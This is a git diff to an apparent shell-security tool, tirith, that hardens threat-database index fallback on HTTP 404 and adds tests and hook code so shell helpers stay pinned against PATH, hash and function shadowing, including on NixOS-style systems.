+            fs::write(
+                &launcher,
+                format!(
+                    "#!/bin/sh\nprintf BAD > '{}'\n",
+                    root.join("executed").display()
+                ),
+            )
+            .unwrap();
+            fs::set_permissions(&launcher, fs::Permissions::from_mode(0o755)).unwrap();
+            let shim = root.join("custom-data/shims/tirith");
+            fs::create_dir_all(shim.parent().unwrap()).unwrap();
+            symlink(&launcher, &shim).unwrap();
+            (shim, current.canonicalize().unwrap())
+        }
+
+        #[test]
+        fn same_mise_and_rtx_data_roots_are_not_conflicting_installs() {
+            for manager in ["mise", "rtx"] {
+                let root = tempfile::tempdir().unwrap();
+                let (shim, current) = layout(root.path(), manager);
+                assert!(find_shadow_binaries_in(
+                    vec![current.clone(), shim.clone(), shim],
+                    Some(&current)
+                )
+                .is_empty());
+                assert!(!root.path().join("executed").exists());
+            }
+        }
+
+        #[test]
+        fn unrelated_mise_launchers_and_real_conflicts_still_warn_once() {
+            let root = tempfile::tempdir().unwrap();
+            let (shim, current) = layout(root.path(), "mise");
+            let unrelated = root.path().join("other-data/installs/tirith/0.4.1/tirith");
+            file(&unrelated);
+            let unrelated = unrelated.canonicalize().unwrap();
+            assert_eq!(
+                find_shadow_binaries_in(vec![shim.clone(), shim.clone()], Some(&unrelated)),
+                vec![shim.display().to_string()]
+            );
+
+            // Merely pointing at a manager is insufficient outside shims/.
+            let fake = root.path().join("bin/tirith");
+            symlink(root.path().join("bin/mise"), &fake).unwrap();
+            let conflict = root.path().join("pip/bin/tirith");
+            file(&conflict);
+            let alias = root.path().join("pip/bin/tirith-alias");
+            symlink(&conflict, &alias).unwrap();
+            assert_eq!(
+                find_shadow_binaries_in(
+                    vec![shim, fake.clone(), conflict.clone(), alias],
+                    Some(&current)
+                ),
+                vec![fake.display().to_string(), conflict.display().to_string()]
+            );
+        }
+
+        #[test]
+        fn arbitrary_shim_targets_and_non_symlink_wrappers_are_not_suppressed() {
+            let root = tempfile::tempdir().unwrap();
+            let (shim, current) = layout(root.path(), "other-launcher");
+            assert_eq!(
+                find_shadow_binaries_in(vec![shim.clone()], Some(&current)),
+                vec![shim.display().to_string()]
+            );
+            fs::remove_file(&shim).unwrap();
+            file(&shim);
+            assert_eq!(
+                find_shadow_binaries_in(vec![shim.clone()], Some(&current)),
+                vec![shim.display().to_string()]
+            );
+        }
     }
 
     #[cfg(unix)]

--- a/crates/tirith/src/cli/threatdb_cmd.rs
+++ b/crates/tirith/src/cli/threatdb_cmd.rs
@@ -1707,7 +1707,10 @@ where
 
 /// Candidate-selection core, split from HTTP so the primary-invalid/fallback-
 /// valid security boundary is directly regression-testable with signed fixtures.
-fn fetch_index_v2_with<F>(mut fetch: F, verify_key: &VerifyingKey) -> Result<Option<IndexV2>, String>
+fn fetch_index_v2_with<F>(
+    mut fetch: F,
+    verify_key: &VerifyingKey,
+) -> Result<Option<IndexV2>, String>
 where
     F: FnMut(&str) -> Result<Option<IndexV2>, String>,
 {
@@ -3600,7 +3603,11 @@ mod tests {
                 .unwrap_err();
                 assert!(error.contains("404"), "{error}");
                 assert!(
-                    error.contains(if invalid_signature { "signature" } else { "503" }),
+                    error.contains(if invalid_signature {
+                        "signature"
+                    } else {
+                        "503"
+                    }),
                     "{error}"
                 );
             }

--- a/crates/tirith/src/cli/threatdb_cmd.rs
+++ b/crates/tirith/src/cli/threatdb_cmd.rs
@@ -366,9 +366,9 @@ enum UpdateOutcome {
     Installed,
     /// The installed DB is already current; nothing was written.
     AlreadyCurrent,
-    /// The v2-index path found no compatible asset and declined cleanly, so the
-    /// caller should fall back to the legacy manifest. (Never returned by the
-    /// legacy path itself.)
+    /// The optional v2 channel is unpublished or has no compatible asset, so
+    /// the caller should use the legacy manifest. Never returned by the legacy
+    /// path itself.
     NoCompatibleAsset,
 }
 
@@ -380,8 +380,7 @@ enum UpdateOutcome {
 fn do_update(force: bool) -> Result<(), String> {
     let outcome = match try_v2_index_update(force) {
         Ok(UpdateOutcome::NoCompatibleAsset) => {
-            // The index was valid but offered no compatible asset: fall back to
-            // the legacy manifest (v1).
+            // The optional index is unpublished or offers no compatible asset.
             do_update_legacy(force)?
         }
         Ok(other) => other,
@@ -424,15 +423,19 @@ where
 /// Attempt the v2-index update path. Returns:
 /// - `Ok(Installed)`: a compatible asset was fetched, verified, and installed;
 /// - `Ok(AlreadyCurrent)`: the selected asset is already the installed version;
-/// - `Ok(NoCompatibleAsset)`: the index was valid but offered no compatible
-///   asset, so the caller should fall back to the legacy manifest;
+/// - `Ok(NoCompatibleAsset)`: both index URLs returned 404, or a valid index
+///   offered no compatible asset; use the legacy manifest;
 /// - `Err(_)`: the index could not be fetched / verified / parsed, also a
 ///   fall-back trigger (the caller logs and continues to legacy).
 fn try_v2_index_update(force: bool) -> Result<UpdateOutcome, String> {
     // `fetch_index_v2` returns only a signature- and schema-validated candidate;
     // an invalid primary has already caused the independently published release
     // candidate to be tried.
-    let index = fetch_index_v2()?;
+    let Some(index) = fetch_index_v2()? else {
+        // Both discovery surfaces returned 404: the optional v2 channel has
+        // not been published (or was retired). This is an expected v1 state.
+        return Ok(UpdateOutcome::NoCompatibleAsset);
+    };
 
     let current_tirith_version = env!("CARGO_PKG_VERSION");
     let asset = match index.select_asset(current_tirith_version) {
@@ -1680,7 +1683,8 @@ fn download_url(url: &str, declared_size: u64) -> Result<Vec<u8>, String> {
 /// then the independently published release-asset fallback. A candidate is not
 /// selected merely because its JSON parsed: signature, signed schema version,
 /// and generation shape all have to validate first.
-fn fetch_index_v2() -> Result<IndexV2, String> {
+/// `Ok(None)` means both discovery surfaces returned HTTP 404.
+fn fetch_index_v2() -> Result<Option<IndexV2>, String> {
     let verify_key = VerifyingKey::from_bytes(VERIFY_KEY_BYTES)
         .map_err(|error| format!("invalid embedded public key: {error}"))?;
     fetch_index_v2_with(fetch_index_v2_from, &verify_key)
@@ -1690,27 +1694,29 @@ fn fetch_verified_index_candidate<F>(
     fetch: &mut F,
     url: &str,
     verify_key: &VerifyingKey,
-) -> Result<IndexV2, String>
+) -> Result<Option<IndexV2>, String>
 where
-    F: FnMut(&str) -> Result<IndexV2, String>,
+    F: FnMut(&str) -> Result<Option<IndexV2>, String>,
 {
-    let index = fetch(url)?;
+    let Some(index) = fetch(url)? else {
+        return Ok(None);
+    };
     index.verify_signature_with_key(verify_key)?;
-    Ok(index)
+    Ok(Some(index))
 }
 
 /// Candidate-selection core, split from HTTP so the primary-invalid/fallback-
 /// valid security boundary is directly regression-testable with signed fixtures.
-fn fetch_index_v2_with<F>(mut fetch: F, verify_key: &VerifyingKey) -> Result<IndexV2, String>
+fn fetch_index_v2_with<F>(mut fetch: F, verify_key: &VerifyingKey) -> Result<Option<IndexV2>, String>
 where
-    F: FnMut(&str) -> Result<IndexV2, String>,
+    F: FnMut(&str) -> Result<Option<IndexV2>, String>,
 {
     let primary = fetch_verified_index_candidate(&mut fetch, INDEX_V2_URL_PRIMARY, verify_key);
     let fallback = fetch_verified_index_candidate(&mut fetch, INDEX_V2_URL_FALLBACK, verify_key);
     match (primary, fallback) {
-        (Ok(primary), Ok(fallback)) => match primary.sequence.cmp(&fallback.sequence) {
-            std::cmp::Ordering::Greater => Ok(primary),
-            std::cmp::Ordering::Less => Ok(fallback),
+        (Ok(Some(primary)), Ok(Some(fallback))) => match primary.sequence.cmp(&fallback.sequence) {
+            std::cmp::Ordering::Greater => Ok(Some(primary)),
+            std::cmp::Ordering::Less => Ok(Some(fallback)),
             std::cmp::Ordering::Equal => {
                 if primary.canonical_payload() != fallback.canonical_payload() {
                     return Err(format!(
@@ -1718,21 +1724,29 @@ where
                         primary.sequence
                     ));
                 }
-                Ok(primary)
+                Ok(Some(primary))
             }
         },
-        (Ok(primary), Err(fallback_err)) => {
+        (Ok(Some(primary)), Err(fallback_err)) => {
             eprintln!(
                 "tirith: v2 index fallback unavailable or invalid ({fallback_err}); using verified primary"
             );
-            Ok(primary)
+            Ok(Some(primary))
         }
-        (Err(primary_err), Ok(fallback)) => {
+        (Err(primary_err), Ok(Some(fallback))) => {
             eprintln!(
                 "tirith: v2 index primary unavailable or invalid ({primary_err}); using verified fallback"
             );
-            Ok(fallback)
+            Ok(Some(fallback))
         }
+        (Ok(primary), Ok(None)) => Ok(primary),
+        (Ok(None), Ok(fallback)) => Ok(fallback),
+        (Err(error), Ok(None)) => Err(format!(
+            "v2 index fetch/verification failed: primary: {error}; fallback: HTTP 404 Not Found"
+        )),
+        (Ok(None), Err(error)) => Err(format!(
+            "v2 index fetch/verification failed: primary: HTTP 404 Not Found; fallback: {error}"
+        )),
         (Err(primary_err), Err(fallback_err)) => Err(format!(
             "v2 index fetch/verification failed: primary: {primary_err}; fallback: {fallback_err}"
         )),
@@ -1741,7 +1755,7 @@ where
 
 /// Fetch and parse a v2 index from one URL (no ETag cache: the index is small
 /// and fetched at most once per update). Size-bounded to [`MAX_MANIFEST_SIZE`].
-fn fetch_index_v2_from(url: &str) -> Result<IndexV2, String> {
+fn fetch_index_v2_from(url: &str) -> Result<Option<IndexV2>, String> {
     validate_remote_url(url, "threat DB index")?;
     let client = guarded_http_client(MANIFEST_TIMEOUT_SECS)?;
     let resp = client
@@ -1752,6 +1766,9 @@ fn fetch_index_v2_from(url: &str) -> Result<IndexV2, String> {
         )
         .send()
         .map_err(|e| format!("v2 index fetch failed: {e}"))?;
+    if resp.status() == reqwest::StatusCode::NOT_FOUND {
+        return Ok(None);
+    }
     if !resp.status().is_success() {
         return Err(format!("v2 index HTTP {}", resp.status()));
     }
@@ -1765,7 +1782,9 @@ fn fetch_index_v2_from(url: &str) -> Result<IndexV2, String> {
     let body_bytes = read_bounded_bytes(resp, "v2-index", None, MAX_MANIFEST_SIZE)?;
     let body = String::from_utf8(body_bytes)
         .map_err(|e| format!("v2 index body is not valid UTF-8: {e}"))?;
-    serde_json::from_str::<IndexV2>(&body).map_err(|e| format!("invalid v2 index JSON: {e}"))
+    serde_json::from_str::<IndexV2>(&body)
+        .map(Some)
+        .map_err(|e| format!("invalid v2 index JSON: {e}"))
 }
 
 /// Durable atomic write: write and sync a temp file in the same directory,
@@ -3484,16 +3503,17 @@ mod tests {
         let selected = fetch_index_v2_with(
             |url| {
                 if url == INDEX_V2_URL_PRIMARY {
-                    Ok(primary.clone())
+                    Ok(Some(primary.clone()))
                 } else if url == INDEX_V2_URL_FALLBACK {
-                    Ok(fallback.clone())
+                    Ok(Some(fallback.clone()))
                 } else {
                     Err(format!("unexpected URL: {url}"))
                 }
             },
             &key.verifying_key(),
         )
-        .expect("a valid release index must survive an invalid primary");
+        .expect("a valid release index must survive an invalid primary")
+        .expect("a verified index is present");
         assert_eq!(selected.sequence, 9);
         assert!(selected
             .verify_signature_with_key(&key.verifying_key())
@@ -3508,14 +3528,15 @@ mod tests {
         let selected = fetch_index_v2_with(
             |url| {
                 if url == INDEX_V2_URL_PRIMARY {
-                    Ok(primary.clone())
+                    Ok(Some(primary.clone()))
                 } else {
-                    Ok(fallback.clone())
+                    Ok(Some(fallback.clone()))
                 }
             },
             &key.verifying_key(),
         )
-        .expect("a replayed older primary must not outrank the release pointer");
+        .expect("a replayed older primary must not outrank the release pointer")
+        .expect("a verified index is present");
         assert_eq!(selected.sequence, 9);
     }
 
@@ -3530,15 +3551,81 @@ mod tests {
         let error = fetch_index_v2_with(
             |url| {
                 if url == INDEX_V2_URL_PRIMARY {
-                    Ok(primary.clone())
+                    Ok(Some(primary.clone()))
                 } else {
-                    Ok(fallback.clone())
+                    Ok(Some(fallback.clone()))
                 }
             },
             &key.verifying_key(),
         )
         .expect_err("one sequence cannot identify two signed generations");
         assert!(error.contains("equivocation"), "{error}");
+    }
+
+    #[test]
+    fn unpublished_v2_channel_is_a_clean_fallback() {
+        let key = SigningKey::from_bytes(&[16u8; 32]);
+        let mut requests = Vec::new();
+        let index = fetch_index_v2_with(
+            |url| {
+                requests.push(url.to_string());
+                Ok(None)
+            },
+            &key.verifying_key(),
+        )
+        .unwrap();
+        assert!(index.is_none());
+        assert_eq!(requests, [INDEX_V2_URL_PRIMARY, INDEX_V2_URL_FALLBACK]);
+    }
+
+    #[test]
+    fn missing_v2_surface_does_not_hide_integrity_or_transport_errors() {
+        let key = SigningKey::from_bytes(&[17u8; 32]);
+        let mut tampered = signed_index_v2(9, vec![asset(1, None), asset(2, None)], &key);
+        tampered.sequence += 1;
+        for missing_primary in [false, true] {
+            for invalid_signature in [false, true] {
+                let error = fetch_index_v2_with(
+                    |url| {
+                        if (url == INDEX_V2_URL_PRIMARY) == missing_primary {
+                            Ok(None)
+                        } else if invalid_signature {
+                            Ok(Some(tampered.clone()))
+                        } else {
+                            Err("v2 index HTTP 503 Service Unavailable".to_string())
+                        }
+                    },
+                    &key.verifying_key(),
+                )
+                .unwrap_err();
+                assert!(error.contains("404"), "{error}");
+                assert!(
+                    error.contains(if invalid_signature { "signature" } else { "503" }),
+                    "{error}"
+                );
+            }
+        }
+    }
+
+    #[test]
+    fn a_verified_v2_surface_survives_an_unpublished_peer() {
+        let key = SigningKey::from_bytes(&[18u8; 32]);
+        let valid = signed_index_v2(9, vec![asset(1, None), asset(2, None)], &key);
+        for missing_primary in [false, true] {
+            let selected = fetch_index_v2_with(
+                |url| {
+                    if (url == INDEX_V2_URL_PRIMARY) == missing_primary {
+                        Ok(None)
+                    } else {
+                        Ok(Some(valid.clone()))
+                    }
+                },
+                &key.verifying_key(),
+            )
+            .unwrap()
+            .unwrap();
+            assert_eq!(selected.sequence, 9);
+        }
     }
 
     #[test]

--- a/crates/tirith/tests/shell_helper_portability.rs
+++ b/crates/tirith/tests/shell_helper_portability.rs
@@ -1,0 +1,285 @@
+//! Helper discovery must work on non-FHS hosts without allowing later PATH or
+//! command-cache changes to redirect a hook's capture/receipt operations.
+#![cfg(unix)]
+
+use std::fs;
+use std::os::unix::fs::{symlink, PermissionsExt};
+use std::path::{Path, PathBuf};
+use std::process::{Command, Output};
+
+#[path = "pty_support/mod.rs"]
+mod pty_support;
+
+fn shells() -> Vec<(&'static str, PathBuf)> {
+    let mut shells = vec![(
+        "bash",
+        pty_support::modern_bash().unwrap_or_else(|| PathBuf::from("/bin/bash")),
+    )];
+    if let Some(shell) = pty_support::zsh_bin() {
+        shells.push(("zsh", shell));
+    }
+    if let Some(shell) = pty_support::fish_bin() {
+        shells.push(("fish", shell));
+    }
+    shells
+}
+
+fn quote(path: &Path) -> String {
+    format!("'{}'", path.display().to_string().replace('\'', "'\\''"))
+}
+
+fn run(shell: &Path, family: &str, root: &Path, interactive: bool, script: &str) -> Output {
+    let mut command = Command::new(shell);
+    match family {
+        "bash" => command.args(["--noprofile", "--norc"]),
+        "zsh" => command.arg("-f"),
+        "fish" => command.arg("--no-config"),
+        _ => unreachable!(),
+    };
+    if interactive {
+        command.arg("-i");
+    }
+    let output = command
+        .args(["-c", script])
+        .env_clear()
+        .env("HOME", root)
+        .env("XDG_STATE_HOME", root.join("state"))
+        .env("XDG_DATA_HOME", root.join("data"))
+        .env("XDG_CONFIG_HOME", root.join("config"))
+        .env("TERM", "xterm")
+        .current_dir(root)
+        .output()
+        .unwrap();
+    assert!(
+        output.status.success(),
+        "{family}: script failed: {}",
+        String::from_utf8_lossy(&output.stderr)
+    );
+    output
+}
+
+fn executable(path: &Path, body: &str) {
+    fs::write(path, format!("#!/bin/sh\n{body}\n")).unwrap();
+    fs::set_permissions(path, fs::Permissions::from_mode(0o755)).unwrap();
+}
+
+fn fixture() -> tempfile::TempDir {
+    let root = tempfile::tempdir().unwrap();
+    for directory in ["good bin", "fixed", "shadow", "relative"] {
+        fs::create_dir(root.path().join(directory)).unwrap();
+    }
+    for directory in ["good bin", "fixed"] {
+        executable(
+            &root.path().join(directory).join("tool"),
+            "printf 'PINNED_OK\\n'",
+        );
+    }
+    for directory in ["shadow", "relative"] {
+        executable(
+            &root.path().join(directory).join("tool"),
+            "printf 'SHADOWED\\n'",
+        );
+    }
+    executable(&root.path().join("good bin/tirith"), "exit 1");
+    root
+}
+
+#[test]
+fn helper_resolution_ignores_hashes_functions_and_relative_path_entries() {
+    for (family, shell) in shells() {
+        let root = fixture();
+        let hook = pty_support::embedded_hook(&format!("{family}-hook.{family}"));
+        let good = quote(&root.path().join("good bin"));
+        let fixed = quote(&root.path().join("fixed/tool"));
+        let shadow = quote(&root.path().join("shadow"));
+        let script = if family == "fish" {
+            format!(
+                r#"set -gx PATH {good}; source {hook};
+function tool; builtin printf 'FUNCTION_BAD\n'; end
+builtin printf 'FIXED=%s\n' (_tirith_resolve_helper tool /missing/helper {fixed})
+set -gx PATH relative '' {good}
+set -l pinned (_tirith_resolve_helper tool /missing/helper)
+builtin printf 'FALLBACK=%s\n' "$pinned"
+_tirith_resolve_helper printf /missing/helper; builtin printf 'BUILTIN_RC=%s\n' $status
+set -gx PATH relative ''
+_tirith_resolve_helper tool /missing/helper; builtin printf 'RELATIVE_RC=%s\n' $status
+set -gx PATH {shadow}
+command "$pinned"
+"#,
+                hook = quote(&hook),
+            )
+        } else {
+            // Both shells can retain a stale hash even while the named file
+            // exists on PATH; this was missed by the original PR #241 probe.
+            let stale_hash = if family == "zsh" {
+                "hash tool=/missing/cached/tool"
+            } else {
+                "hash -p /missing/cached/tool tool"
+            };
+            format!(
+                r#"PATH={good}; source {hook};
+tool() {{ builtin printf 'FUNCTION_BAD\n'; }}
+{stale_hash}
+builtin printf 'FIXED=%s\n' "$(_tirith_resolve_helper tool /missing/helper {fixed})"
+PATH=relative::{good}
+pinned="$(_tirith_resolve_helper tool /missing/helper)"
+builtin printf 'FALLBACK=%s\n' "$pinned"
+_tirith_resolve_helper printf /missing/helper; builtin printf 'BUILTIN_RC=%s\n' "$?"
+PATH=relative:
+_tirith_resolve_helper tool /missing/helper; builtin printf 'RELATIVE_RC=%s\n' "$?"
+PATH={shadow}
+command "$pinned"
+"#,
+                hook = quote(&hook),
+            )
+        };
+        let output = run(&shell, family, root.path(), false, &script);
+        let stdout = String::from_utf8_lossy(&output.stdout);
+        for expected in [
+            format!("FIXED={}/fixed/tool", root.path().display()),
+            format!("FALLBACK={}/good bin/tool", root.path().display()),
+            "BUILTIN_RC=1".into(),
+            "RELATIVE_RC=1".into(),
+            "PINNED_OK".into(),
+        ] {
+            assert!(stdout.contains(&expected), "{family}: {stdout}");
+        }
+        assert!(!stdout.contains("SHADOWED"), "{family}: {stdout}");
+        assert!(!stdout.contains("FUNCTION_BAD"), "{family}: {stdout}");
+    }
+}
+
+// Remove only the fixed helper candidates in a private hook copy to reproduce
+// NixOS on an FHS test host. The fallback and all capture logic remain intact.
+fn non_fhs_hook(family: &str, root: &Path) -> PathBuf {
+    let name = format!("{family}-hook.{family}");
+    let mut hook = fs::read_to_string(pty_support::embedded_hook(&name)).unwrap();
+    for helper in ["mktemp", "rm", "wc", "mkdir", "stty", "env", "sh", "bash"] {
+        for prefix in ["/usr/bin/", "/bin/"] {
+            hook = hook.replace(
+                &format!("{prefix}{helper}"),
+                &format!("/missing-tirith-test-helper/{helper}"),
+            );
+        }
+    }
+    let destination = root.join(name);
+    fs::write(&destination, hook).unwrap();
+    destination
+}
+
+#[test]
+fn non_fhs_hooks_pin_all_helpers_and_create_private_captures() {
+    for (family, shell) in shells() {
+        let root = fixture();
+        let bin = root.path().join("good bin");
+        for helper in ["mktemp", "rm", "wc", "mkdir", "stty", "env", "sh", "bash"] {
+            let output = Command::new("sh")
+                .args(["-c", &format!("command -v {helper}")])
+                .output()
+                .unwrap();
+            assert!(output.status.success(), "test needs {helper}");
+            let target = String::from_utf8(output.stdout).unwrap();
+            symlink(target.trim(), bin.join(helper)).unwrap();
+        }
+        let hook = non_fhs_hook(family, root.path());
+        let expected = ["MKTEMP", "RM", "WC"];
+        let script = if family == "fish" {
+            format!(
+                r#"set -gx PATH {bin}; source {hook}
+builtin printf 'PINS=%s|%s|%s\n' "$_TIRITH_MKTEMP_BIN" "$_TIRITH_RM_BIN" "$_TIRITH_WC_BIN"
+builtin printf 'READY=%s\n' "$_TIRITH_V3_HELPERS_READY"
+set -gx PATH /missing-after-source
+set -l capture (_tirith_v3_new_capture_file)
+test -f "$capture"; and test -O "$capture"; and not test -L "$capture"; or exit 1
+_tirith_v3_remove_capture_files "$capture"; or exit 1
+test ! -e "$capture"; or exit 1
+builtin printf 'CAPTURE_OK\n'
+"#,
+                bin = quote(&bin),
+                hook = quote(&hook),
+            )
+        } else {
+            let capture_function = if family == "bash" {
+                "_tirith_new_capture_file"
+            } else {
+                "_tirith_v3_new_capture_file"
+            };
+            let remove_function = if family == "bash" {
+                "_tirith_remove_capture_file"
+            } else {
+                "_tirith_v3_remove_capture_files"
+            };
+            format!(
+                r#"PATH={bin}; source {hook}
+builtin printf 'PINS=%s|%s|%s\n' "$_TIRITH_MKTEMP_BIN" "$_TIRITH_RM_BIN" "$_TIRITH_WC_BIN"
+PATH=/missing-after-source
+capture="$({capture_function})" || exit 1
+[[ -f "$capture" && -O "$capture" && ! -L "$capture" ]] || exit 1
+{remove_function} "$capture" || exit 1
+[[ ! -e "$capture" ]] || exit 1
+builtin printf 'CAPTURE_OK\n'
+"#,
+                bin = quote(&bin),
+                hook = quote(&hook),
+            )
+        };
+        let output = run(&shell, family, root.path(), false, &script);
+        let stdout = String::from_utf8_lossy(&output.stdout);
+        for helper in expected {
+            assert!(
+                stdout.contains(&format!("{}/{}", bin.display(), helper.to_lowercase())),
+                "{family}: {stdout}"
+            );
+        }
+        assert!(stdout.contains("CAPTURE_OK"), "{family}: {stdout}");
+        if family == "fish" {
+            assert!(stdout.contains("READY=1"), "{family}: {stdout}");
+        }
+    }
+}
+
+#[test]
+fn missing_startup_capture_helpers_preserve_interactive_enter_bindings() {
+    for (family, shell) in shells().into_iter().filter(|(name, _)| *name != "bash") {
+        let root = fixture();
+        let bin = root.path().join("good bin");
+        let hook = non_fhs_hook(family, root.path());
+        let script = if family == "fish" {
+            format!(
+                r#"set -gx PATH {bin}
+bind \r 'commandline -f execute'
+set -l before (bind \r | string collect)
+source {hook}
+set -l after (bind \r | string collect)
+test "$before" = "$after"; or exit 1
+functions -q _tirith_check_command; and exit 1
+set -q _TIRITH_FISH_LOADED; and exit 1
+builtin printf 'STATUS=%s\nENTER_UNCHANGED\n' "$TIRITH_STATUS"
+"#,
+                bin = quote(&bin),
+                hook = quote(&hook),
+            )
+        } else {
+            format!(
+                r#"PATH={bin}
+before="$widgets[accept-line]"
+source {hook}
+[[ "$before" == "$widgets[accept-line]" ]] || exit 1
+(( $+functions[_tirith_accept_line] )) && exit 1
+[[ -z "${{_TIRITH_ZSH_LOADED:-}}" ]] || exit 1
+builtin printf 'STATUS=%s\nENTER_UNCHANGED\n' "$TIRITH_STATUS"
+"#,
+                bin = quote(&bin),
+                hook = quote(&hook),
+            )
+        };
+        let output = run(&shell, family, root.path(), true, &script);
+        let stdout = String::from_utf8_lossy(&output.stdout);
+        assert!(stdout.contains("STATUS=off"), "{family}: {stdout}");
+        assert!(stdout.contains("ENTER_UNCHANGED"), "{family}: {stdout}");
+        assert!(
+            String::from_utf8_lossy(&output.stderr).contains("hooks disabled"),
+            "{family}: expected an explicit startup warning"
+        );
+    }
+}

--- a/docs/release-notes-0.4.1.md
+++ b/docs/release-notes-0.4.1.md
@@ -138,11 +138,13 @@ now records when each pinned commit was authored and when its pin was selected,
 and the compiler verifies both against the checked-out tree rather than
 trusting the document.
 
-**Operator action for anyone running this pipeline in their own fork:** the
-watcher needs a `THREATDB_PIN_PR_TOKEN` repository secret (contents plus pull
-requests, that repository only) to push its branch and open the review pull
-request. Until it is set, the watcher fails at the token check the first time a
-pin actually changes.
+**Pipeline configuration:** validation runs with a read-only token. A separate
+publication job uses the repository's `GITHUB_TOKEN` to open the review PR;
+enable “Allow GitHub Actions to create and approve pull requests” in repository
+Actions settings. Approve the resulting pending workflow runs before merging.
+An optional `THREATDB_PIN_PR_TOKEN` secret (contents plus pull requests, scoped
+to this repository) lets those PR workflows start automatically. Neither job
+receives the production signing key, and pins still require human review.
 
 ## Upgrade and installation
 

--- a/shell/lib/bash-hook.bash
+++ b/shell/lib/bash-hook.bash
@@ -125,21 +125,40 @@ fi
 # long-lived interactive shell) Tirith's parent. Capture Tirith stdout in a
 # private temporary file instead: Tirith remains a direct child, parsing happens
 # in this shell, and every caller removes the file immediately.
-_TIRITH_MKTEMP_BIN=""
-[[ -f /usr/bin/mktemp && -x /usr/bin/mktemp ]] && _TIRITH_MKTEMP_BIN=/usr/bin/mktemp
-[[ -z "$_TIRITH_MKTEMP_BIN" && -f /bin/mktemp && -x /bin/mktemp ]] && _TIRITH_MKTEMP_BIN=/bin/mktemp
-_TIRITH_RM_BIN=""
-[[ -f /bin/rm && -x /bin/rm ]] && _TIRITH_RM_BIN=/bin/rm
-[[ -z "$_TIRITH_RM_BIN" && -f /usr/bin/rm && -x /usr/bin/rm ]] && _TIRITH_RM_BIN=/usr/bin/rm
-_TIRITH_MKDIR_BIN=""
-[[ -f /bin/mkdir && -x /bin/mkdir ]] && _TIRITH_MKDIR_BIN=/bin/mkdir
-[[ -z "$_TIRITH_MKDIR_BIN" && -f /usr/bin/mkdir && -x /usr/bin/mkdir ]] && _TIRITH_MKDIR_BIN=/usr/bin/mkdir
-_TIRITH_WC_BIN=""
-[[ -f /usr/bin/wc && -x /usr/bin/wc ]] && _TIRITH_WC_BIN=/usr/bin/wc
-[[ -z "$_TIRITH_WC_BIN" && -f /bin/wc && -x /bin/wc ]] && _TIRITH_WC_BIN=/bin/wc
-_TIRITH_STTY_BIN=""
-[[ -f /bin/stty && -x /bin/stty ]] && _TIRITH_STTY_BIN=/bin/stty
-[[ -z "$_TIRITH_STTY_BIN" && -f /usr/bin/stty && -x /usr/bin/stty ]] && _TIRITH_STTY_BIN=/usr/bin/stty
+# Prefer system helpers, then search the PATH present when this hook is sourced
+# for non-FHS systems (NixOS/Guix). Inspect files directly to ignore command
+# hashes, aliases and functions. Skip relative/empty entries so changing cwd or
+# PATH later cannot redirect a pinned helper to a repository executable.
+_tirith_resolve_helper() {
+  local name="$1" candidate directory remaining="${PATH-}"
+  shift
+  for candidate in "$@"; do
+    if [[ "$candidate" == /* && -f "$candidate" && -x "$candidate" ]]; then
+      builtin printf '%s\n' "$candidate"
+      return 0
+    fi
+  done
+  while [[ -n "$remaining" ]]; do
+    directory="${remaining%%:*}"
+    case "$remaining" in
+      *:*) remaining="${remaining#*:}" ;;
+      *) remaining="" ;;
+    esac
+    [[ "$directory" == /* ]] || continue
+    candidate="${directory%/}/$name"
+    if [[ -f "$candidate" && -x "$candidate" ]]; then
+      builtin printf '%s\n' "$candidate"
+      return 0
+    fi
+  done
+  return 1
+}
+
+_TIRITH_MKTEMP_BIN="$(_tirith_resolve_helper mktemp /usr/bin/mktemp /bin/mktemp)" || _TIRITH_MKTEMP_BIN=""
+_TIRITH_RM_BIN="$(_tirith_resolve_helper rm /bin/rm /usr/bin/rm)" || _TIRITH_RM_BIN=""
+_TIRITH_MKDIR_BIN="$(_tirith_resolve_helper mkdir /bin/mkdir /usr/bin/mkdir)" || _TIRITH_MKDIR_BIN=""
+_TIRITH_WC_BIN="$(_tirith_resolve_helper wc /usr/bin/wc /bin/wc)" || _TIRITH_WC_BIN=""
+_TIRITH_STTY_BIN="$(_tirith_resolve_helper stty /bin/stty /usr/bin/stty)" || _TIRITH_STTY_BIN=""
 
 _tirith_new_capture_file() {
   [[ -n "$_TIRITH_MKTEMP_BIN" && -n "$_TIRITH_RM_BIN" ]] || return 1

--- a/shell/lib/fish-hook.fish
+++ b/shell/lib/fish-hook.fish
@@ -31,50 +31,53 @@ if not string match -q '/*' -- "$_TIRITH_BIN"; or not test -x "$_TIRITH_BIN"
 end
 
 # Protocol-v3 callbacks run after arbitrary commands may have changed PATH.
-# Pin every external helper they use to a fixed system location now, and only
-# advertise receipt support when the complete helper set is available.
-set -g _TIRITH_MKTEMP_BIN ""
-if test -f /usr/bin/mktemp; and test -x /usr/bin/mktemp
-    set -g _TIRITH_MKTEMP_BIN /usr/bin/mktemp
-else if test -f /bin/mktemp; and test -x /bin/mktemp
-    set -g _TIRITH_MKTEMP_BIN /bin/mktemp
+# Prefer system helpers, then search the source-time PATH for non-FHS systems
+# (NixOS/Guix). Inspect files directly to ignore aliases, functions and command
+# caches. Relative/empty PATH entries must never become helper pins.
+function _tirith_resolve_helper
+    set -l name "$argv[1]"
+    for candidate in $argv[2..-1]
+        if string match -q '/*' -- "$candidate"; and test -f "$candidate"; and test -x "$candidate"
+            builtin printf '%s\n' "$candidate"
+            return 0
+        end
+    end
+    for directory in $PATH
+        string match -q '/*' -- "$directory"; or continue
+        set -l candidate "$directory/$name"
+        if test -f "$candidate"; and test -x "$candidate"
+            builtin printf '%s\n' "$candidate"
+            return 0
+        end
+    end
+    return 1
 end
-set -g _TIRITH_RM_BIN ""
-if test -f /bin/rm; and test -x /bin/rm
-    set -g _TIRITH_RM_BIN /bin/rm
-else if test -f /usr/bin/rm; and test -x /usr/bin/rm
-    set -g _TIRITH_RM_BIN /usr/bin/rm
-end
-set -g _TIRITH_WC_BIN ""
-if test -f /usr/bin/wc; and test -x /usr/bin/wc
-    set -g _TIRITH_WC_BIN /usr/bin/wc
-else if test -f /bin/wc; and test -x /bin/wc
-    set -g _TIRITH_WC_BIN /bin/wc
-end
-set -g _TIRITH_ENV_BIN ""
-if test -f /usr/bin/env; and test -x /usr/bin/env
-    set -g _TIRITH_ENV_BIN /usr/bin/env
-else if test -f /bin/env; and test -x /bin/env
-    set -g _TIRITH_ENV_BIN /bin/env
-end
-set -g _TIRITH_SH_BIN ""
-if test -f /bin/sh; and test -x /bin/sh
-    set -g _TIRITH_SH_BIN /bin/sh
-else if test -f /usr/bin/sh; and test -x /usr/bin/sh
